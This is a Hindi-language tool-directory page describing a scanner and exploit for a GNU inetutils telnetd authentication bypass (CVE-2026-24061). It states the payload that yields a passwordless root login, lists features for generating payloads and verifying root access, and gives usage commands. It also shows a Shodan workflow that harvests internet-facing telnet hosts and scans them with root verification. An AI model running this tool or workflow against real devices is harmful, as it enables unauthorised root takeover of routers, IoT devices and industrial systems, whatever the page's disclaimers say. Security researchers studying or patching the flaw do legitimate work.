Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/killsystema/scan-cve-2026-24061
टोहीभेद्यता स्कैनरIoT सुरक्षाशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubkillsystema/scan-cve-2026-24061

scan-cve-2026-24061

CVE-2026-24061 telnetd प्रमाणीकरण बाईपास के लिए स्कैन करता है, पेलोड उत्पन्न करता है और कमजोर GNU inetutils telnetd उपकरणों पर रूट एक्सेस सत्यापित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-24061 स्कैनर – GNU inetutils telnetd Auth Bypass

⚠️ बहुत महत्वपूर्ण कानूनी चेतावनी ⚠️
यह टूल केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान, भेद्यता विश्लेषण और अधिकृत परीक्षणों के लिए है।

  • उन सिस्टमों के विरुद्ध कोई भी अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके लिए आपके पास लिखित स्पष्ट अनुमति नहीं है, अपराध है (ब्राज़ील में: दंड संहिता की धारा 154-A + कानून 14.155/2021, साथ ही अन्य अंतरराष्ट्रीय कानून)।
  • केवल अपने स्वयं के वातावरण, नियंत्रित प्रयोगशालाओं, या हस्ताक्षरित RoE (Rules of Engagement) के साथ पेंटेस्ट/रेड टीम के दौरान उपयोग करें।
  • लेखक किसी भी दुरुपयोग, क्षति, IP ब्लॉक, कानूनी परिणाम या दुर्भावनापूर्ण शोषण के लिए जिम्मेदार नहीं है।

भेद्यता के बारे में (CVE-2026-24061)

  • आधिकारिक नाम: GNU inetutils telnetd ≤ 2.7 – Authentication Bypass to Root Shell
  • CVSS: 9.8 (क्रिटिकल)
  • शोषण: NEW-ENVIRON विकल्प के माध्यम से USER=-f root (या विविधताएं) भेजने से बिना पासवर्ड के तुरंत root के रूप में लॉगिन संभव होता है।
  • प्रभावित: IoT डिवाइस, पुराने राउटर, एम्बेडेड सिस्टम, NAS, DVR, औद्योगिक PLC जो अभी भी GNU inetutils telnetd (संस्करण ≤ 2.7) का उपयोग करते हैं।
  • फरवरी 2026 में स्थिति: वाइल्ड में सक्रिय रूप से शोषित (CISA KEV जनवरी/2026 से, GreyNoise दैनिक प्रयासों का पता लगा रहा है)।

विशेष धन्यवाद

यह स्कैनर Hakai Security टीम द्वारा प्रकाशित उत्कृष्ट तकनीकी विश्लेषण और प्रूफ ऑफ कॉन्सेप्ट की बदौलत ही संभव हो सका।
उनके विस्तृत लेख ने शोषण वेक्टर, वास्तविक पेलोड और कमजोर telnetd के व्यवहार के बारे में सटीक तकनीकी आधार प्रदान किए।

→ पूरा विश्लेषण यहां पढ़ें:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/

Hakai Security को बहुत धन्यवाद पारदर्शिता, तकनीकी गुणवत्ता और सुरक्षा समुदाय में योगदान के लिए। आपने इस टूल को जिम्मेदार अनुसंधान के लिए अधिक सटीक और उपयोगी बनाने में मदद की।

स्कैनर की विशेषताएं

  • व्यक्तिगत IP, CIDR (/24, /16, आदि) और लक्ष्यों की सूची वाली .txt फ़ाइलों के लिए समर्थन
  • बड़े नेटवर्क के लिए चेतावनी के साथ स्वचालित IPv4 क्लासफुल क्लास (A/B/C) पहचान
  • कई पेलोड की गतिशील पीढ़ी (-f root, -f admin, --, -p, आदि के साथ विविधताएं)
  • --users के माध्यम से अनुकूलन योग्य उपयोगकर्ता सूची (डिफ़ॉल्ट में root, admin, pi, ubuntu, debian, आदि शामिल हैं)
  • id और whoami के माध्यम से वास्तविक root सत्यापन (--verify)
  • Telnet बैनर कैप्चर और प्रदर्शन (--banner)
  • पोर्ट 23 पर SSH का प्रारंभिक पता लगाना (गलत सकारात्मक से बचने के लिए परीक्षण छोड़ देता है)
  • समानांतर निष्पादन (-w के साथ समायोज्य)
  • रंगीन आउटपुट: कमजोर के लिए गहरा लाल + "!!! VULNERÁVEL !!!"
  • Ctrl+C का सुंदर हैंडलिंग
  • IP द्वारा क्रमबद्ध JSON में सहेजे गए परिणाम

स्थापना

root@kitploit:~
# अनुशंसित: virtualenv का उपयोग करें
python3 -m venv venv-cve
source venv-cve/bin/activate

# निर्भरताएं स्थापित करें
pip install telnetlib3 colorama

बुनियादी उपयोग

root@kitploit:~
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50

# लक्ष्यों की सूची के साथ (उदा: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json

# root पर केंद्रित (तेज़)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5

# ड्राई-रन (केवल IP सूचीबद्ध करता है)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run

लक्ष्य कैसे प्राप्त करें (Shodan CLI के साथ उदाहरण)

root@kitploit:~
pip install shodan

# अपनी API Key के साथ आरंभ करें
shodan init SUA_API_KEY_AQUI

# संभावित लक्ष्य डाउनलोड करें
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'

# IP निकालें
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt

# स्कैन
python3 scan-cve-2026-24061.py alvos.txt --verify --banner

योगदान

Pull requests का स्वागत है, बशर्ते नैतिक फोकस बनाए रखा जाए और जिम्मेदारी की चेतावनियों को सुदृढ़ किया जाए। लाइसेंस MIT License – लेकिन मैं दोहराता हूं: अनधिकृत उपयोग की पूरी जिम्मेदारी उपयोगकर्ता की है। अध्ययन, जागरूकता और सुरक्षा अनुसंधान के लिए बनाया गया।

⭐ अगर उपयोगी लगा, तो एक स्टार दें!

🛡️ अत्यधिक जिम्मेदारी के साथ उपयोग करें।

Made with ❤️ by killsystema

टूल डाउनलोड करें